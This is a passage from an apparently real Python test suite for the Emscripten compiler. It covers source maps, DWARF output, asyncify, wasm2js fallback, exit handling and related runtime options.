if self.get_setting('MODULARIZE'):
post_js += 'var TheModule = Module();\n'
else:
post_js += 'var TheModule = Module;\n'
post_js += '\n\n'
if allow_memory_growth:
post_js += "var isMemoryGrowthAllowed = true;\n"
else:
post_js += "var isMemoryGrowthAllowed = false;\n"
post_js += read_file(test_file('webidl/post.js'))
post_js += '\n\n'
create_file('extern-post.js', post_js)
# Export things on "TheModule". This matches the typical use pattern of the bound library
# being used as Box2D.* or Ammo.*, and we cannot rely on "Module" being always present (closure may remove it).
self.emcc_args += ['-sEXPORTED_FUNCTIONS=_malloc,_free', '--post-js=glue.js', '--extern-post-js=extern-post.js']
if mode == 'ALL':
self.emcc_args += ['-sASSERTIONS']
if allow_memory_growth:
self.set_setting('ALLOW_MEMORY_GROWTH')
if not mode:
mode = 'DEFAULT'
expected = test_file('webidl/output_%s.txt' % mode)
self.do_run_from_file(test_file('webidl/test.cpp'), expected)
### Tests for tools
@no_wasm2js('TODO: source maps in wasm2js')
@parameterized({
'': ([],),
'minimal_runtime': (['-sMINIMAL_RUNTIME'],),
})
def test_source_map(self, args):
if '-g' not in self.emcc_args:
self.emcc_args.append('-g')
self.emcc_args += args
src = '''
#include <stdio.h>
#include <assert.h>
__attribute__((noinline)) int foo() {
printf("hi"); // line 6
return 1; // line 7
}
int main() {
printf("%d", foo()); // line 11
return 0; // line 12
}
'''
create_file('src.cpp', src)
out_filename = 'a.out.js'
wasm_filename = 'a.out.wasm'
no_maps_filename = 'no-maps.out.js'
assert '-gsource-map' not in self.emcc_args
self.emcc('src.cpp', self.get_emcc_args(), out_filename)
# the file name may find its way into the generated code, so make sure we
# can do an apples-to-apples comparison by compiling with the same file name
shutil.move(out_filename, no_maps_filename)
no_maps_file = read_file(no_maps_filename)
no_maps_file = re.sub(' *//[@#].*$', '', no_maps_file, flags=re.MULTILINE)
self.emcc_args.append('-gsource-map')
self.emcc(os.path.abspath('src.cpp'),
self.get_emcc_args(),
out_filename)
map_referent = out_filename if not self.is_wasm() else wasm_filename
# after removing the @line and @sourceMappingURL comments, the build
# result should be identical to the non-source-mapped debug version.
# this is worth checking because the parser AST swaps strings for token
# objects when generating source maps, so we want to make sure the
# optimizer can deal with both types.
map_filename = map_referent + '.map'
data = json.load(open(map_filename))
if 'file' in data:
# the file attribute is optional, but if it is present it needs to refer to
# the output file.
self.assertPathsIdentical(map_referent, data['file'])
self.assertGreater(len(data['sources']), 1)
self.assertContained('src.cpp', data['sources'])
src_index = data['sources'].index('src.cpp')
if 'sourcesContent' in data:
# the sourcesContent attribute is optional, but if it is present it
# needs to contain valid source text.
self.assertTextDataIdentical(src, data['sourcesContent'][src_index])
mappings = json.loads(self.run_js(
path_from_root('tests/sourcemap2json.js'),
args=[map_filename]))
seen_lines = set()
for m in mappings:
if m['source'] == 'src.cpp':
seen_lines.add(m['originalLine'])
# ensure that all the 'meaningful' lines in the original code get mapped
# when optimizing, the binaryen optimizer may remove some of them (by inlining, etc.)
if self.is_optimizing():
self.assertTrue(seen_lines.issuperset([11, 12]), seen_lines)
else:
self.assertTrue(seen_lines.issuperset([6, 7, 11, 12]), seen_lines)
@no_wasm2js('TODO: source maps in wasm2js')
def test_dwarf(self):
self.emcc_args.append('-g')
js_filename = 'a.out.js'
wasm_filename = 'a.out.wasm'
shutil.copyfile(test_file('core/test_dwarf.c'), 'test_dwarf.c')
self.emcc('test_dwarf.c', self.get_emcc_args(), js_filename)
out = self.run_process([shared.LLVM_DWARFDUMP, wasm_filename, '-all'], stdout=PIPE).stdout
# parse the sections
sections = {}
curr_section_name = ''
curr_section_body = ''
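# add_section stores the body collected so far under the current section name;
# it runs whenever a new '<section> contents:' header is found and once more
# after the loop to flush the final section.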
def add_section():
if curr_section_name:
sections[curr_section_name] = curr_section_body
for line in out.splitlines():
if ' contents:' in line:
# a new section, a line like ".debug_str contents:"
add_section()
curr_section_name = line.split(' ')[0]
curr_section_body = ''
else:
# possibly a line in a section
if curr_section_name:
curr_section_body += line + '\n'
add_section()
# make sure the right sections exist
self.assertIn('.debug_abbrev', sections)
self.assertIn('.debug_info', sections)
self.assertIn('.debug_line', sections)
self.assertIn('.debug_str', sections)
self.assertIn('.debug_ranges', sections)
# verify some content in the sections
self.assertIn('"test_dwarf.c"', sections['.debug_info'])
# the line section looks like this:
# Address Line Column File ISA Discriminator Flags
# ------------------ ------ ------ ------ --- ------------- -------------
# 0x000000000000000b 5 0 3 0 0 is_stmt
src_to_addr = {}
found_dwarf_c = False
for line in sections['.debug_line'].splitlines():
if 'name: "test_dwarf.c"' in line:
found_dwarf_c = True
if not found_dwarf_c:
continue
if 'debug_line' in line:
break
if line.startswith('0x'):
while ' ' in line:
line = line.replace(' ', ' ')
addr, line, col = line.split(' ')[:3]
key = (int(line), int(col))
src_to_addr.setdefault(key, []).append(addr)
# each of the calls must remain in the binary, and be mapped
self.assertIn((6, 3), src_to_addr)
self.assertIn((7, 3), src_to_addr)
self.assertIn((8, 3), src_to_addr)
def get_dwarf_addr(line, col):
addrs = src_to_addr[(line, col)]
# we assume the simple calls have one address
self.assertEqual(len(addrs), 1)
return int(addrs[0], 0)
# the lines must appear in sequence (as calls to JS, the optimizer cannot
# reorder them)
self.assertLess(get_dwarf_addr(6, 3), get_dwarf_addr(7, 3))
self.assertLess(get_dwarf_addr(7, 3), get_dwarf_addr(8, 3))
# Get the wat, printing with -g which has binary offsets
wat = self.run_process([Path(building.get_binaryen_bin(), 'wasm-opt'),
wasm_filename, '-g', '--print'], stdout=PIPE).stdout
# We expect to see a pattern like this in optimized builds (there isn't
# much that can change with such calls to JS; they can't be reordered or
# anything else):
#
# ;; code offset: 0x?
# (drop
# ;; code offset: 0x?
# (call $out_to_js
# ;; code offset: 0x?
# (local.get ?) or (i32.const ?)
# )
# )
#
# In the stacky stream of instructions form, it is
#
# local.get or i32.const
# call $out_to_js
# drop
#
# However, in an unoptimized build the constant may be assigned earlier in
# some other manner, so stop here.
if not self.is_optimizing():
return
# get_wat_addr gets the address of one of the 3 interesting calls, by its
# index (0,1,2).
def get_wat_addr(call_index):
# find the call_index-th call
call_loc = -1
for i in range(call_index + 1):
call_loc = wat.find('call $out_to_js', call_loc + 1)
assert call_loc > 0
# the call begins with the local.get/i32.const printed below it, which is
# the first instruction in the stream, so it has the lowest address
start_addr_loc = wat.find('0x', call_loc)
assert start_addr_loc > 0
start_addr_loc_end = wat.find('\n', start_addr_loc)
start_addr = int(wat[start_addr_loc:start_addr_loc_end], 0)
# the call ends with the drop, which is the last in the stream, at the
# highest address
end_addr_loc = wat.rfind('drop', 0, call_loc)
assert end_addr_loc > 0
end_addr_loc = wat.rfind('0x', 0, end_addr_loc)
assert end_addr_loc > 0
end_addr_loc_end = wat.find('\n', end_addr_loc)
assert end_addr_loc_end > 0
end_addr = int(wat[end_addr_loc:end_addr_loc_end], 0)
return (start_addr, end_addr)
# match up the DWARF and the wat
for i in range(3):
dwarf_addr = get_dwarf_addr(6 + i, 3)
start_wat_addr, end_wat_addr = get_wat_addr(i)
# the dwarf may match any of the 3 instructions that form the stream
# of instructions implementing the call in the source code, in theory
self.assertLessEqual(start_wat_addr, dwarf_addr)
self.assertLessEqual(dwarf_addr, end_wat_addr)
def test_modularize_closure_pre(self):
# test that the combination of modularize + closure + pre-js works. in that mode,
# closure should not minify the Module object in a way that prevents the pre-js from using it.
create_file('post.js', 'var TheModule = Module();\n')
if not self.is_wasm():
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
self.emcc_args += [
'--pre-js', test_file('core/modularize_closure_pre.js'),
'--extern-post-js=post.js',
'--closure=1',
'-g1',
'-s',
'MODULARIZE=1',
]
self.do_core_test('modularize_closure_pre.c')
@no_wasm2js('symbol names look different wasm2js backtraces')
def test_emscripten_log(self):
self.banned_js_engines = [config.V8_ENGINE] # v8 doesn't support console.log
self.set_setting('DEMANGLE_SUPPORT')
if '-g' not in self.emcc_args:
self.emcc_args.append('-g')
self.emcc_args += ['-DRUN_FROM_JS_SHELL']
self.do_run_in_out_file_test('emscripten_log/emscripten_log.cpp', interleaved_output=False)
# test closure compiler as well
if self.maybe_closure():
self.emcc_args += ['-g1'] # extra testing
self.do_run_in_out_file_test('emscripten_log/emscripten_log_with_closure.cpp', interleaved_output=False)
def test_float_literals(self):
self.do_run_in_out_file_test('test_float_literals.cpp')
def test_exit_status(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
create_file('exit.c', r'''
#include <stdio.h>
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
static void cleanup() {
#ifndef NORMAL_EXIT
assert(0 && "cleanup should only be called from normal exit()");
#endif
printf("cleanup\n");
}
int main() {
atexit(cleanup); // this atexit should still be called
printf("hello, world!\n");
// Unusual exit status to make sure it's working!
#ifdef CAPITAL_EXIT
_Exit(118);
#elif defined(UNDER_EXIT)
_exit(118);
#elif defined(NORMAL_EXIT)
exit(118);
#endif
}
''')
create_file('pre.js', '''
Module.onExit = function() {
out('I see exit status: ' + EXITSTATUS);
}
''')
self.emcc_args += ['--pre-js', 'pre.js']
print('.. exit')
self.do_runf('exit.c', 'hello, world!\ncleanup\nI see exit status: 118', assert_returncode=118, emcc_args=['-DNORMAL_EXIT'])
print('.. _exit')
self.do_runf('exit.c', 'hello, world!\nI see exit status: 118', assert_returncode=118, emcc_args=['-DUNDER_EXIT'])
print('.. _Exit')
self.do_runf('exit.c', 'hello, world!\nI see exit status: 118', assert_returncode=118, emcc_args=['-DCAPITAL_EXIT'])
def test_noexitruntime(self):
src = r'''
#include <emscripten.h>
#include <stdio.h>
static int testPre = TEST_PRE;
struct Global {
Global() {
printf("in Global()\n");
if (testPre) { EM_ASM(noExitRuntime = true;); }
}
~Global() { printf("ERROR: in ~Global()\n"); }
} global;
int main() {
if (!testPre) { EM_ASM(noExitRuntime = true;); }
printf("in main()\n");
}
'''
self.do_run(src.replace('TEST_PRE', '0'), 'in Global()\nin main()')
self.do_run(src.replace('TEST_PRE', '1'), 'in Global()\nin main()')
def test_minmax(self):
self.do_runf(test_file('test_minmax.c'), 'NAN != NAN\nSuccess!')
def test_localeconv(self):
self.do_run_in_out_file_test('core/test_localeconv.c')
def test_newlocale(self):
self.do_run_in_out_file_test('core/test_newlocale.c')
def test_setlocale(self):
self.do_run_in_out_file_test('core/test_setlocale.c')
def test_vswprintf_utf8(self):
self.do_run_in_out_file_test('vswprintf_utf8.c')
# needs setTimeout which only node has
@require_node
@no_memory64('TODO: asyncify for wasm64')
def test_async_hello(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.set_setting('ASYNCIFY')
create_file('main.c', r'''
#include <stdio.h>
#include <emscripten.h>
void f(void *p) {
*(int*)p = 99;
printf("!");
}
int main() {
int i = 0;
printf("Hello");
emscripten_async_call(f, &i, 1);
printf("World");
emscripten_sleep(100);
printf("%d\n", i);
}
''')
self.do_runf('main.c', 'HelloWorld!99')
@require_node
@no_memory64('TODO: asyncify for wasm64')
def test_async_ccall_bad(self):
# check bad ccall use
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.set_setting('ASYNCIFY')
self.set_setting('ASSERTIONS')
self.set_setting('INVOKE_RUN', 0)
create_file('main.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
printf("Hello");
emscripten_sleep(100);
printf("World\n");
}
''')
create_file('pre.js', '''
Module['onRuntimeInitialized'] = function() {
try {
ccall('main', 'number', ['number', 'string'], [2, 'waka']);
var never = true;
} catch(e) {
out(e);
assert(!never);
}
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
self.do_runf('main.c', 'The call to main is running asynchronously.')
@require_node
@no_memory64('TODO: asyncify for wasm64')
def test_async_ccall_good(self):
# check reasonable ccall use
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.set_setting('ASYNCIFY')
self.set_setting('ASSERTIONS')
self.set_setting('INVOKE_RUN', 0)
create_file('main.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
printf("Hello");
emscripten_sleep(100);
printf("World\n");
}
''')
create_file('pre.js', '''
Module['onRuntimeInitialized'] = function() {
ccall('main', null, ['number', 'string'], [2, 'waka'], { async: true });
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
self.do_runf('main.c', 'HelloWorld')
@parameterized({
'': (False,),
'exit_runtime': (True,),
})
@no_memory64('TODO: asyncify for wasm64')
def test_async_ccall_promise(self, exit_runtime):
self.set_setting('ASYNCIFY')
self.set_setting('EXIT_RUNTIME')
self.set_setting('ASSERTIONS')
self.set_setting('INVOKE_RUN', 0)
self.set_setting('EXIT_RUNTIME', exit_runtime)
self.set_setting('EXPORTED_FUNCTIONS', ['_stringf', '_floatf'])
create_file('main.c', r'''
#include <stdio.h>
#include <emscripten.h>
const char* stringf(char* param) {
emscripten_sleep(20);
printf("stringf: %s", param);
return "second";
}
double floatf() {
emscripten_sleep(20);
emscripten_sleep(20);
return 6.4;
}
''')
create_file('pre.js', r'''
Module['onRuntimeInitialized'] = function() {
runtimeKeepalivePush();
ccall('stringf', 'string', ['string'], ['first\n'], { async: true })
.then(function(val) {
console.log(val);
ccall('floatf', 'number', null, null, { async: true }).then(function(arg) {
console.log(arg);
runtimeKeepalivePop();
maybeExit();
});
});
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
self.do_runf('main.c', 'stringf: first\nsecond\n6.4')
@no_memory64('TODO: asyncify for wasm64')
def test_fibers_asyncify(self):
self.set_setting('ASYNCIFY')
self.maybe_closure()
self.do_runf(test_file('test_fibers.cpp'), '*leaf-0-100-1-101-1-102-2-103-3-104-5-105-8-106-13-107-21-108-34-109-*')
def test_asyncify_unused(self):
# test a program not using asyncify, but the pref is set
self.set_setting('ASYNCIFY')
self.do_core_test('test_hello_world.c')
@parameterized({
'normal': ([], True),
'removelist_a': (['-sASYNCIFY_REMOVE=["foo(int, double)"]'], False),
'removelist_b': (['-sASYNCIFY_REMOVE=["bar()"]'], True),
'removelist_c': (['-sASYNCIFY_REMOVE=["baz()"]'], False),
'onlylist_a': (['-sASYNCIFY_ONLY=["main","__original_main","foo(int, double)","baz()","c_baz","Structy::funcy()","bar()"]'], True),
'onlylist_b': (['-sASYNCIFY_ONLY=["main","__original_main","foo(int, double)","baz()","c_baz","Structy::funcy()"]'], True),
'onlylist_c': (['-sASYNCIFY_ONLY=["main","__original_main","foo(int, double)","baz()","c_baz"]'], False),
'onlylist_d': (['-sASYNCIFY_ONLY=["foo(int, double)","baz()","c_baz","Structy::funcy()"]'], False),
'onlylist_b_response': ([], True, '["main","__original_main","foo(int, double)","baz()","c_baz","Structy::funcy()"]'),
'onlylist_c_response': ([], False, '["main","__original_main","foo(int, double)","baz()","c_baz"]'),
})
@no_memory64('TODO: asyncify for wasm64')
def test_asyncify_lists(self, args, should_pass, response=None):
if response is not None:
create_file('response.file', response)
self.set_setting('ASYNCIFY_ONLY', '@response.file')
self.set_setting('ASYNCIFY')
self.emcc_args += args
if should_pass:
self.do_core_test('test_asyncify_lists.cpp', assert_identical=True)
else:
self.do_runf(test_file('core/test_asyncify_lists.cpp'), ('RuntimeError', 'Thrown at'), assert_returncode=NON_ZERO)
# use of ASYNCIFY_* options may require intermediate debug info. that should
# not end up emitted in the final binary
if self.is_wasm():
filename = 'test_asyncify_lists.wasm'
# there should be no name section. sanitizers, however, always enable that
if not is_sanitizing(self.emcc_args):
self.assertFalse(webassembly.Module(filename).has_name_section())
# in a fully-optimized build, imports and exports are minified too and we
# can verify that our function names appear nowhere
if '-O3' in self.emcc_args:
binary = read_binary(filename)
self.assertFalse(b'main' in binary)
@parameterized({
'normal': ([], True),
'ignoreindirect': (['-sASYNCIFY_IGNORE_INDIRECT'], False),
'add': (['-sASYNCIFY_IGNORE_INDIRECT', '-sASYNCIFY_ADD=["__original_main","main","virt()"]'], True),
})
@no_memory64('TODO: asyncify for wasm64')
def test_asyncify_indirect_lists(self, args, should_pass):
self.set_setting('ASYNCIFY')
self.emcc_args += args
try:
self.do_core_test('test_asyncify_indirect_lists.cpp', assert_identical=True)
if not should_pass:
should_pass = True
raise Exception('should not have passed')
except Exception:
if should_pass:
raise
@no_asan('asyncify stack operations confuse asan')
@no_memory64('TODO: asyncify for wasm64')
def test_emscripten_scan_registers(self):
self.set_setting('ASYNCIFY')
self.do_core_test('test_emscripten_scan_registers.cpp')
@no_memory64('TODO: asyncify for wasm64')
def test_asyncify_assertions(self):
self.set_setting('ASYNCIFY')
self.set_setting('ASYNCIFY_IMPORTS', ['suspend'])
self.set_setting('ASSERTIONS')
self.do_core_test('test_asyncify_assertions.c', assert_returncode=NON_ZERO)
@no_lsan('leaks asyncify stack during exit')
@no_asan('leaks asyncify stack during exit')
@no_memory64('TODO: asyncify for wasm64')
def test_asyncify_during_exit(self):
self.set_setting('ASYNCIFY')
self.set_setting('ASSERTIONS')
self.set_setting('EXIT_RUNTIME', 1)
self.do_core_test('test_asyncify_during_exit.cpp', assert_returncode=NON_ZERO)
print('NO_ASYNC')
self.do_core_test('test_asyncify_during_exit.cpp', emcc_args=['-DNO_ASYNC'], out_suffix='_no_async')
@no_asan('asyncify stack operations confuse asan')
@no_lsan('undefined symbol __global_base')
@no_wasm2js('dynamic linking support in wasm2js')
def test_asyncify_main_module(self):
self.set_setting('ASYNCIFY', 1)
self.set_setting('MAIN_MODULE', 2)
self.do_core_test('test_hello_world.c')
@no_asan('asyncify stack operations confuse asan')
@no_memory64('TODO: asyncify for wasm64')
@no_wasm2js('TODO: lazy loading in wasm2js')
@parameterized({
'conditional': (True,),
'unconditional': (False,),
})
def test_emscripten_lazy_load_code(self, conditional):
self.set_setting('ASYNCIFY_LAZY_LOAD_CODE')
self.set_setting('ASYNCIFY_IGNORE_INDIRECT')
self.set_setting('MALLOC', 'emmalloc')
self.emcc_args += ['--profiling-funcs'] # so that we can find the functions for the changes below
if conditional:
self.emcc_args += ['-DCONDITIONAL']
self.do_core_test('emscripten_lazy_load_code.cpp', args=['0'])
first_size = os.path.getsize('emscripten_lazy_load_code.wasm')
second_size = os.path.getsize('emscripten_lazy_load_code.wasm.lazy.wasm')
print('first wasm size', first_size)
print('second wasm size', second_size)
if not conditional and self.is_optimizing() and '-g' not in self.emcc_args and '-fsanitize=leak' not in self.emcc_args:
# If the call to lazy-load is unconditional, then the optimizer can dce
# out more than half
self.assertLess(first_size, 0.6 * second_size)
wasm1 = read_binary('emscripten_lazy_load_code.wasm')
wasm2 = read_binary('emscripten_lazy_load_code.wasm.lazy.wasm')
self.assertNotEqual(wasm1, wasm2)
# attempts to "break" the wasm by adding an unreachable in $foo_end. returns whether we found it.
def break_wasm(name):
wat = self.run_process([Path(building.get_binaryen_bin(), 'wasm-dis'), name], stdout=PIPE).stdout
lines = wat.splitlines()
wat = None
for i in range(len(lines)):
if '(func $foo_end ' in lines[i]:
j = i + 1
while '(local ' in lines[j]:
j += 1
# we found the first line after the local defs
lines[j] = '(unreachable)' + lines[j]
wat = '\n'.join(lines)
break
if wat is None:
# $foo_end is not present in the wasm, nothing to break
shutil.copyfile(name, name + '.orig')
return False
with open('wat.wat', 'w') as f:
f.write(wat)
shutil.move(name, name + '.orig')
self.run_process([Path(building.get_binaryen_bin(), 'wasm-as'), 'wat.wat', '-o', name, '-g'])
return True
def verify_working(args=['0']):
self.assertContained('foo_end\n', self.run_js('emscripten_lazy_load_code.js', args=args))
def verify_broken(args=['0']):
self.assertNotContained('foo_end\n', self.run_js('emscripten_lazy_load_code.js', args=args, assert_returncode=NON_ZERO))
# the first-loaded wasm will not reach the second call, since we call it after lazy-loading.
# verify that by changing the first wasm to throw in that function
found_foo_end = break_wasm('emscripten_lazy_load_code.wasm')
if not conditional and self.is_optimizing():
self.assertFalse(found_foo_end, 'should have optimized out $foo_end')
verify_working()
# but breaking the second wasm actually breaks us
if not break_wasm('emscripten_lazy_load_code.wasm.lazy.wasm'):
raise Exception('could not break lazy wasm - missing expected code')
verify_broken()
# restore
shutil.copyfile('emscripten_lazy_load_code.wasm.orig', 'emscripten_lazy_load_code.wasm')
shutil.copyfile('emscripten_lazy_load_code.wasm.lazy.wasm.orig', 'emscripten_lazy_load_code.wasm.lazy.wasm')
verify_working()
if conditional:
# if we do not call the lazy load function, then we do not need the lazy wasm,
# and we do the second call in the first wasm
os.remove('emscripten_lazy_load_code.wasm.lazy.wasm')
verify_broken()
verify_working(['42'])
break_wasm('emscripten_lazy_load_code.wasm')
verify_broken()
# Test basic wasm2js functionality in all core compilation modes.
@no_asan('no wasm2js support yet in asan')
@no_lsan('no wasm2js support yet in lsan')
def test_wasm2js(self):
if not self.is_wasm():
self.skipTest('redundant to test wasm2js in wasm2js* mode')
self.set_setting('WASM', 0)
self.do_core_test('test_hello_world.c')
# a mem init file is emitted just like with JS
expect_memory_init_file = self.uses_memory_init_file()
if expect_memory_init_file:
self.assertExists('test_hello_world.js.mem')
mem = read_binary('test_hello_world.js.mem')
self.assertTrue(mem[-1] != b'\0')
else:
self.assertNotExists('test_hello_world.js.mem')
@no_asan('no wasm2js support yet in asan')
@no_lsan('no wasm2js support yet in lsan')
def test_maybe_wasm2js(self):
if not self.is_wasm():
self.skipTest('redundant to test wasm2js in wasm2js* mode')
self.set_setting('MAYBE_WASM2JS')
# see that running as wasm works
self.do_core_test('test_hello_world.c')
# run wasm2js, bundle the code, and use the wasm2js path
cmd = [PYTHON, path_from_root('tools/maybe_wasm2js.py'), 'test_hello_world.js', 'test_hello_world.wasm']
if self.is_optimizing():
cmd += ['-O2']
self.run_process(cmd, stdout=open('do_wasm2js.js', 'w')).stdout
# remove the wasm to make sure we never use it again
os.remove('test_hello_world.wasm')
# verify that it runs
self.assertContained('hello, world!', self.run_js('do_wasm2js.js'))
@no_asan('no wasm2js support yet in asan')
@parameterized({
'': ([],),
'minimal_runtime': (['-sMINIMAL_RUNTIME'],),
})
def test_wasm2js_fallback(self, args):
if not self.is_wasm():
self.skipTest('redundant to test wasm2js in wasm2js* mode')
cmd = [EMCC, test_file('small_hello_world.c'), '-sWASM=2'] + args
self.run_process(cmd)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('a.out.wasm.js', 'a.out.wasm.js.unused')
self.assertContained('hello!', self.run_js('a.out.js'))
os.rename('a.out.wasm.js.unused', 'a.out.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
open('b.out.js', 'w').write('WebAssembly = undefined;\n' + read_file('a.out.js'))
os.remove('a.out.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.assertContained('hello!', self.run_js('b.out.js'))
def test_cxx_self_assign(self):
# See https://github.com/emscripten-core/emscripten/pull/2688 and http://llvm.org/bugs/show_bug.cgi?id=18735
self.do_run(r'''
#include <map>
#include <stdio.h>
int main() {
std::map<int, int> m;
m[0] = 1;
m = m;
// size should still be one after self assignment
if (m.size() == 1) {
printf("ok.\n");
}
}
''', 'ok.')
def test_memprof_requirements(self):
# This test checks for the global variables required to run the memory
# profiler. It would fail if these variables were made no longer global
# or if their identifiers were changed.
create_file('main.c', '''
int check_memprof_requirements();
int main() {
return check_memprof_requirements();
}
''')
create_file('lib.js', '''
mergeInto(LibraryManager.library, {
check_memprof_requirements: function() {
if (typeof _emscripten_stack_get_base === 'function' &&
typeof _emscripten_stack_get_end === 'function' &&
typeof _emscripten_stack_get_current === 'function' &&
typeof Module['___heap_base'] === 'number') {
out('able to run memprof');
return 0;
} else {
out('missing the required variables to run memprof');
return 1;
}
}
});
''')
self.emcc_args += ['--memoryprofiler', '--js-library', 'lib.js']
self.do_runf('main.c', 'able to run memprof')
def test_fs_dict(self):
self.set_setting('FORCE_FILESYSTEM')
self.emcc_args += ['-lidbfs.js']
self.emcc_args += ['-lnodefs.js']
create_file('pre.js', '''
Module = {};
Module['preRun'] = function() {
out(typeof FS.filesystems['MEMFS']);
out(typeof FS.filesystems['IDBFS']);
out(typeof FS.filesystems['NODEFS']);
// Globals
console.log(typeof MEMFS);
console.log(typeof IDBFS);
console.log(typeof NODEFS);
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
self.do_run('int main() { return 0; }', 'object\nobject\nobject\nobject\nobject\nobject')
def test_fs_dict_none(self):
# if IDBFS and NODEFS are not enabled, they are not present.
self.set_setting('FORCE_FILESYSTEM')
self.set_setting('ASSERTIONS')
create_file('pre.js', '''
Module = {};
Module['preRun'] = function() {
out(typeof FS.filesystems['MEMFS']);
out(typeof FS.filesystems['IDBFS']);
out(typeof FS.filesystems['NODEFS']);
// Globals
if (ASSERTIONS) {
console.log(typeof MEMFS);
console.log(IDBFS);
console.log(NODEFS);
FS.mkdir('/working1');
try {
FS.mount(IDBFS, {}, '/working1');
} catch (e) {
console.log('|' + e + '|');
}
}
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
expected = '''\
object
undefined
undefined
object
IDBFS is no longer included by default; build with -lidbfs.js
NODEFS is no longer included by default; build with -lnodefs.js
|IDBFS is no longer included by default; build with -lidbfs.js|'''
self.do_run('int main() { return 0; }', expected)
def test_stack_overflow_check(self):
self.set_setting('TOTAL_STACK', 1048576)
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.do_runf(test_file('stack_overflow.cpp'), 'stack overflow', assert_returncode=NON_ZERO)
self.emcc_args += ['-DONE_BIG_STRING']
self.do_runf(test_file('stack_overflow.cpp'), 'stack overflow', assert_returncode=NON_ZERO)
# ASSERTIONS=2 implies STACK_OVERFLOW_CHECK=2
self.clear_setting('STACK_OVERFLOW_CHECK')
self.set_setting('ASSERTIONS', 2)
self.do_runf(test_file('stack_overflow.cpp'), 'stack overflow', assert_returncode=NON_ZERO)
@node_pthreads
def test_binaryen_2170_emscripten_atomic_cas_u8(self):
self.set_setting('USE_PTHREADS')
self.do_run_in_out_file_test('binaryen_2170_emscripten_atomic_cas_u8.cpp')
@also_with_standalone_wasm()
def test_sbrk(self):
self.do_runf(test_file('sbrk_brk.cpp'), 'OK.')
def test_brk(self):
self.emcc_args += ['-DTEST_BRK=1']
self.do_runf(test_file('sbrk_brk.cpp'), 'OK.')
# Tests that we can use the dlmalloc mallinfo() function to obtain information
# about malloc()ed blocks and compute how much memory is used/freed.
@no_asan('mallinfo is not part of ASan malloc')
@no_lsan('mallinfo is not part of LSan malloc')
def test_mallinfo(self):
self.do_runf(test_file('mallinfo.cpp'), 'OK.')
@no_asan('cannot replace malloc/free with ASan')
@no_lsan('cannot replace malloc/free with LSan')
def test_wrap_malloc(self):
self.do_runf(test_file('wrap_malloc.cpp'), 'OK.')
def test_environment(self):
self.set_setting('ASSERTIONS')
def test(assert_returncode=0):
self.do_core_test('test_hello_world.c', assert_returncode=assert_returncode)
js = read_file('test_hello_world.js')
assert ('require(' in js) == ('node' in self.get_setting('ENVIRONMENT')), 'we should have require() calls only if node js specified'
for engine in config.JS_ENGINES:
print(engine)
# set us to test in just this engine
self.banned_js_engines = [e for e in config.JS_ENGINES if e != engine]
# tell the compiler to build with just that engine
if engine == config.NODE_JS:
right = 'node'
wrong = 'shell'
else:
right = 'shell'
wrong = 'node'
# test with the right env
self.set_setting('ENVIRONMENT', right)
print('ENVIRONMENT =', self.get_setting('ENVIRONMENT'))
test()
# test with the wrong env
self.set_setting('ENVIRONMENT', wrong)
print('ENVIRONMENT =', self.get_setting('ENVIRONMENT'))
try:
test(assert_returncode=NON_ZERO)
raise Exception('unexpected success')
except Exception as e:
self.assertContained('not compiled for this environment', str(e))
# test with a combined env
self.set_setting('ENVIRONMENT', right + ',' + wrong)
print('ENVIRONMENT =', self.get_setting('ENVIRONMENT'))
test()
def test_postrun_exception(self):
# verify that an exception thrown in postRun() will not trigger the
# compilation failed handler, and will be printed to stderr.
# Explicitly disable EXIT_RUNTIME, since otherwise addOnPostRun does not work.
# https://github.com/emscripten-core/emscripten/issues/15080
self.set_setting('EXIT_RUNTIME', 0)
self.add_post_run('ThisFunctionDoesNotExist()')
self.build(test_file('core/test_hello_world.c'))
output = self.run_js('test_hello_world.js', assert_returncode=NON_ZERO)
self.assertStartswith(output, 'hello, world!')
self.assertContained('ThisFunctionDoesNotExist is not defined', output)
# Tests that building with -s DECLARE_ASM_MODULE_EXPORTS=0 works
def test_no_declare_asm_module_exports(self):
self.set_setting('DECLARE_ASM_MODULE_EXPORTS', 0)
self.set_setting('WASM_ASYNC_COMPILATION', 0)
self.maybe_closure()
self.do_runf(test_file('declare_asm_module_exports.cpp'), 'jsFunction: 1')
js = read_file('declare_asm_module_exports.js')
occurances = js.count('cFunction')
if self.is_optimizing() and '-g' not in self.emcc_args:
# In optimized builds only the single reference to cFunction that exists in the EM_ASM should remain
if self.is_wasm():
self.assertEqual(occurances, 1)
else:
# With js the asm module itself also contains a reference for the cFunction name
self.assertEqual(occurances, 2)
else:
print(occurances)
# Tests that building with -s DECLARE_ASM_MODULE_EXPORTS=0 works
@no_asan('TODO: ASan support in minimal runtime')
def test_minimal_runtime_no_declare_asm_module_exports(self):
self.set_setting('DECLARE_ASM_MODULE_EXPORTS', 0)
self.set_setting('WASM_ASYNC_COMPILATION', 0)
self.maybe_closure()
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
self.do_runf(test_file('declare_asm_module_exports.cpp'), 'jsFunction: 1')
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
@parameterized({
'default': ([],),
'streaming': (['-sMINIMAL_RUNTIME_STREAMING_WASM_COMPILATION'],),
'streaming_inst': (['-sMINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION'],),
'no_export': (['-sDECLARE_ASM_MODULE_EXPORTS=0'],)
})
def test_minimal_runtime_hello_world(self, args):
